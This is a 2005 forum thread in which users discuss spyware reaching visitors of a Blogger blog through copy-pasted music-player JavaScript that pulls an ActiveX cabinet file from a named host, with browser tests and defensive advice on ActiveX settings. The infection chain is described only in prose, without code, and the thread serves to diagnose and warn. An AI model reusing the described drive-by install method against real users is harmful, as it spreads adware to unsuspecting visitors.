Spyware hitting blogs
February 21, 2005 10:15 PM   Subscribe

It's still ok to input my credit number in the banner ad so that they can check and make sure it's not stolen right?
posted by riffola at 10:31 PM on February 21, 2005

So how is this nana294 installing spyware exactly? Which platforms/browsers? ActiveX exploit, javascript, some type of overflow exploit? Should I stop clicking links?
posted by bobo123 at 10:43 PM on February 21, 2005

I suspect the exploits are all IE/windows only.
posted by mathowie at 10:54 PM on February 21, 2005

I'm curious about that, too, bobo123. Me, I use either Safari on OS X or Konqueror on Linux. Neither of which makes me "safe," but I am curious what the infection vector would be. I strongly suspect ActiveX and IE on Windows, but what do I know (not much)?

It's a bummer though -- I like the "Next Blog" button. If for nothing else, you can see just how bad some people's design sense is.
posted by teece at 10:58 PM on February 21, 2005

Although, opendiary.com is a good source also. EliteBar is a pain to clean.

I am so glad I self-host.
posted by Samizdata at 11:02 PM on February 21, 2005

Okay, I bit and visited. The culprit weblog looks pretty normal to me (Moz 1.7). Badly written, overdone design, the usual fare. A quick skim through the code didn't reveal anything extraordinarily suspicious. Strange.
posted by DrJohnEvans at 11:08 PM on February 21, 2005

Note: I use Mozilla variants via either Linux or Win98, so my spyware defence is based on a strategy of being in the obscure minority.
posted by DrJohnEvans at 11:09 PM on February 21, 2005

Oh, scumbags, is there any part of the Internet you won't ruin? First it was e-mail... Then it was Usenet... Then it was web ads & cookies... And IMs...

Ah well, there's always Bittorrent.
posted by keswick at 11:28 PM on February 21, 2005

This is ridiculous. First off, the author wont even mention the site in question so I can't test it and he keeps using terms like "my browser" instead of IE or Mozilla. Someone should tell this guy that there's no such thing as security through obscurity and he should try writing some damn details as this just feeds into "the web is unsafe" nonsense. IE may be unsafe, but I would be very surprised to see a cross-browser exploit which installed spyware. Not to mention, someone this technically clueless may just not understand the fact that he may have been infected previously. Who knows.

Details, people. They're good for you.
posted by skallas at 11:40 PM on February 21, 2005

Thanks for giving those "scumbags" new ideas, keswick. And for Christ's sake, don't mention Meta----- ######## NO CARRIER
posted by DaShiv at 11:41 PM on February 21, 2005

skallas, the site in question is mentioned in the "now being transitted" link, in the email copy. It's quoted by the Blogger people in their reply: nana294.blogspot.com.
posted by DrJohnEvans at 11:44 PM on February 21, 2005

Er, I don't see a "next blog" button in the top right corner...

(Linux/Firefox)
posted by salmacis at 12:05 AM on February 22, 2005

salmacis, the MT Law blog moved to their own domain and turned off the Blogger bar. You can still see it at their old domain, complete with zealous warning message.
posted by DrJohnEvans at 12:11 AM on February 22, 2005

BTW - I went to the nana294 blog and I got a Javascript popup saying "Sorry, you are not using a WIN32 computer".
posted by salmacis at 12:12 AM on February 22, 2005

in firefox i see a "additional plugins are required to display all the media on this page" thingy.
likely it's IE only.
posted by juv3nal at 12:12 AM on February 22, 2005

I think I see what it is doing -- in a very general sense. I am neither a Windows Guru nor has my clean programming mind been sullied with the vagaries of Javascript. But the page gets a remote jscript that is ostensibly to play music (iWebTunes), but it also downloads another jscript which gets a file called v3cab.cab from searchmiracle.com/cab. I don't know from a cursory glance how that little file does anything to your machine, but I would guess that is the entry point. It is certainly Windows specific -- they are even kind enough to tell you in the jscript and in a browser pop-up.

Scum-bags. But it also makes me wonder: some people might just see a bit of javascript to play music on their blog, and think, yippee!, and install the code, and then infect people unknowingly. But then again, who can install a bit of Javascript on their web page and not understand such simple things?

Gee, I hope it can't infect wget on my mac ... :-)
posted by teece at 12:17 AM on February 22, 2005

Hey, I opened about eight "next blogs" in new tabs, and one of 'em did manage to sneak a pop-up window through.

Nice bit of work, teece. I imagine that if it was voluntarily installed (and I maintain that that particular blog looks too involved to be only a spyware front), then the installation instructions just called for a strategic copy-and-paste.

Okay, enough playing for tonight. I'm going to bed.
posted by DrJohnEvans at 12:20 AM on February 22, 2005

I bet you're right, DrJohnEvans -- it is only 4 lines of JavaScript that appears to be getting the trojan. I wouldn't be at all surprised if the owner of that Blogger page simply Copy-n-Pasted that code into his/her blog, wanting it to play a tune. It does appear to actually play music (or at least try to), but I don't have a Windows IE platform to test it -- and if I did I wouldn't.

Sigh. Must everything turn into a sewer?
posted by teece at 12:31 AM on February 22, 2005

>quoted by the Blogger people in their reply: nana294.blogspot.com.

Thanks doc.

Okay, I tested this on a winxp box with the following browsers:

Firefox: No effect. Not even the javascript pop-up boxes.

IESP2: I get two javascript pop-up boxes asking me to "upgrade my browser." The activeX handler showed me that software signed by "Enternet Media Inc" was asking to be installed.

Summary:

There is no exploit here. This is ActiveX. ActiveX is Microsoft's web installer. If you click Yes then you are installing software, software which may be spyware. If you click no, you are not. Its that simple. The javascript pop-ups are misleading, but are not an exploit at all. Just a nag box to install this ActiveX control.

Suggestions:

Windows 2000 and XP SP1 users should double check their ActiveX settings. ActiveX download should never be set to "Enable." It should be set to either "Prompt" or "Disable." Users in general should avoid all ActiveX as it is a well known vector for spyware, with the exception of WindowsUpdate. XP SP1 users should move to SP2 as soon as possible as it doesn't allow "drive by" ActiveX installs. Ideally, users should try a non-Microsoft browser if they want to avoid this and other security problems.
posted by skallas at 2:34 AM on February 22, 2005

For anyone still worried, search miracle elitebar is IE on native systems only. Now you know how to avoid it. ;)
posted by dabitch at 3:10 AM on February 22, 2005

So how long before an XPI equivalent is in the wild for Firefox users?
posted by salmacis at 3:13 AM on February 22, 2005

There is no exploit here. But:

- EliteBar uses massively misleading software descriptions. The one I got was:

"YOU have an OUT OF DATE browser which can cause you to get infected with viruses, spam and spyware. To prevent this press YES now."

- EliteBar has installed through IE exploits before (typically MS JVM exploits).

What *could* cause this software to install automatically would be a Trusted Publishers or Trusted Zone hack. Many of the recent very commonplace IE exploits categorised at "CoolWebSearch" add software providers including Enternet Media (EliteBar) to trusted lists, causing their software to get installed instantly without prompting. Typically they later open a web page from that publisher with their own affiliate code in. Anyway, if there was a previous infection, that would cause EliteBar to install without prompting again in the future.

Problems like these are all over the web now, including 'mainstream' sites. "Don't visit untrustworthy sites or porn" just doesn't cut it any more. Turn up all your security settings or don't use IE.
posted by BobInce at 3:30 AM on February 22, 2005

Problems like these are all over the web now, including 'mainstream' sites. "Don't visit untrustworthy sites or porn" just doesn't cut it any more. Turn up all your security settings or don't use IE.

I've seen a couple of threads about popups hitting firefox on slashdot. They get around the blocker via flash or by dynamicaly linking to javascripts.

Serious exploits are only a matter of time and popularity.
posted by srboisvert at 3:38 AM on February 22, 2005

What I've learned from this post is that the search bar and next blog thing on top of Blogger blogs is no longer voluntary. If you have a Blogger blog, you have the search bar on your blogs. Unless I just missed the switch off for it.

And a quick check shows that almost 70% of my site's visitors are still using IE, which is just sad.
posted by fenriq at 8:33 AM on February 22, 2005

Crap. I reported this trick to the Blogger management six months ago -- same sort of thing, installed SearchMiracle on Windows IE (hit a machine where I work, even with AdAware current and running). It infected immediately if you clicked 'next blog' and landed on the infected page. I thought they'd rooted it out. They certainly have been aware it's possible for a long time.

It was then a chunk of code that supposedly played music, that the naive weblog page owner had copied and pasted in -- and it installed a really nasty piece of adware that came in two pieces, each of which could recreate the other if you tried manually deleting it. I've fortunately forgotten the details but a search at AdAware for "blogger" ought to turn up the gory story.
posted by hank at 8:48 AM on February 22, 2005

That bites, and I'm glad it hasn't happened to me; this news is ruining my evening. I love the next blog button, I've spent many useless wasted hours just clicking along through it all.
posted by mygothlaundry at 6:17 PM on February 22, 2005

mygothlaundry, just don't use IE and you will be fine -- the exploit relies upon ActiveX (and your clicking 'yes' to a "browser upgrade.") If you aren't using Windows, then this is not a problem at all.

Hank -- you just describe exactly what the Javascripts I look at do, on the Blogger web page I saw. So apparently Blogger has had no luck figuring out what to do about it.
posted by teece at 6:38 PM on February 22, 2005

Yeah, this is not an exploit of the "next blog" button. This could be an unsuspected part of any personal website.

Heck, you could be visiting your little sister's Geocities website, and if she had decided that she wanted background music from iWebTunes, you'd be attacked. It's an IE vulnerability, not a Blogger one.
posted by DrJohnEvans at 8:16 PM on February 22, 2005

I couldn't find her email, so I left her a message on her Doodle Board.

I feel like I just turned on a hair dryer and pointed it at the rain.
posted by DrJohnEvans at 8:21 PM on February 22, 2005